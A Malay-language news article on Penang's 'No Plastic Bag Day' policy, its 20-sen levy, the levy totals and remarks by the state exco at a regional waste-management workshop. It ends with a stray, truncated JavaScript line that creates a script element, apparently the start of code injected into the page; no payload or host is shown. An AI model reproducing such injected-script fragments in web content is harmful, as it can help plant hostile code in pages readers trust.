‘Hari Tanpa Beg Plastik’ P. Pinang jadi ikutan – Exco

GEORGE TOWN – Tujuh tahun lalu, Pulau Pinang menjadi negeri pertama di Malaysia yang melaksanakan larangan menggunakan beg plastik di pusat membeli-belah dan pasar raya seluruh negeri.

Bermula dengan melaksanakannya secara berperingkat, iaitu tiga hari seminggu tanpa beg plastik, sehingga pada 1 Januari 2011 yang mana semua premis perniagaan termasuk farmasi, restoran makanan segera, kedai serbaneka, kiosk di stesen minyak dan rangkaian nasi kandar tidak lagi memberikan beg plastik secara percuma kepada pelanggan, setiap hari.

Pelanggan yang ingin menggunakan beg plastik ketika membeli-belah, perlu membayar 20 sen levi bagi setiap beg plastik yang digunakan.

Exco Kebajikan, Masyarakat Penyayang dan Alam Sekitar, Phee Boon Poh berkata, Kerajaan Negeri seharusnya berasa bangga apabila inisiatif penguatkuasaan hijau ‘Hari Tanpa Beg Plastik’ yang dilaksanakan sebelum ini terus mendapat sambutan baik dalam kalangan rakyatnya.

“Hakikat ini terbukti apabila jumlah kutipan levi bagi beg plastik menurun saban tahun dan penurunan jumlah kutipan bermaksud penggunaan beg plastik dikurangkan.

“Umum (orang ramai) kini lebih selesa membawa sendiri beg shopping dan ia merupakan petanda yang menunjukkan tahap kesedaran orang ramai (terhadap kelestaraian alam sekitar) meningkat.

“Apatah lagi, kini beberapa buah negeri di Malaysia mula mengikuti jejak Pulau Pinang dengan memilih untuk tidak menggunakan beg plastik pada hari tertentu, malah, ada juga negara-negara serantau yang ingin mengetahui usaha kita (Kerajaan Negeri) dalam menjadikan Pulau Pinang sebuah negeri hijau bertaraf antarabangsa” ujarnya ketika ditemui pada penganjuran Regional Workshop on Waste Management for Climate Change sempena Programme Penang Climate and Clean Air Coalition (CCAC) di sini baru-baru ini.

Hadir menyempurnakan bengkel empat hari tersebut, Ketua Menteri, Y.A.B. Tuan Lim Guan Eng.

Turut sama, Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow; Pegawai Serantau bagi Asia dan Pasifik (ROAP) United Nations Environment Programme (UNEP), Kakuko Yoshida-Nagatani; Pegawai Program International Environment Technology Centre (IE TC), Dr. Mushtaq Ahmed Memon dan Penolong Pengurus (International Cooperation, Environment Bureau, Osaka), Makoto Mihara.

Menurut Boon Poh yang juga Ahli Lembaga Pengarah Penang Green Council (PGC), sejumlah RM5,445,889.84 kutipan levi beg plastik telah dikumpulkan sejak Julai 2009 sehingga September 2016.

“Kutipan levi ini kemudiannya akan digunakan bagi pelaksanaan Agenda Ekonomi Saksama (AES) dalam usaha membasmi kemiskinan tegar di Pulau Pinang.

“Tidak dinafikan, kita (Kerajaan Negeri) ada menerima aduan berhubung kutipan levi ini dan kita akan meneliti segalanya dan mungkin akan perketatkan undang-undang sedia ada,” jelasnya.

var d=document;var s=d.createElement(‘script’);